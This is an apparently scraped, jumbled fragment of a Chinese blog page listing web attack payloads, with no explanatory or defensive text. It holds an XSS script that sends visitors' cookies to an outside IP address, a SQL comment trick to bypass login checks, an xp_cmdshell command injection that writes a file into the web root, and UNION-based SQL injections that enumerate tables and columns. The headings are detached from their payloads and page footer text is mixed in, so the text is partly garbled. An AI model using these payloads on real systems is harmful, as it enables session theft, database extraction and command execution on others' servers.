跳转至恶意站点
数列数
执行命令
猜表名
猜列名
<script>location.href="恶意站点URL"+document.cookie;</script>
<script>location.href="http://192.179.175.218:81/cgi-bin/eatcookie.cgi?cookie="+document.cookie;</script>数列数
select count(*) from employees where Login='user01'-- and Pass='user01'执行命令
';exec master..xp_cmdshell 'echo "Hello \\ Every One 我是高铁侠" > c:\inetpub\wwwroot\temp\secure10_echo.txt' --猜表名
' union select name, null, null, null, null, null, null, null from sysobjects where xtype='U' --猜列名
' union select name from sysobjects where xtype='U' --
' union select name from sysobjects where xtype='U'and name > 'Categories' --
' union select name from syscolumns where id = OBJECT_ID('Employees') and name>'Address'--
' union select EmployeeID from Employees --
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
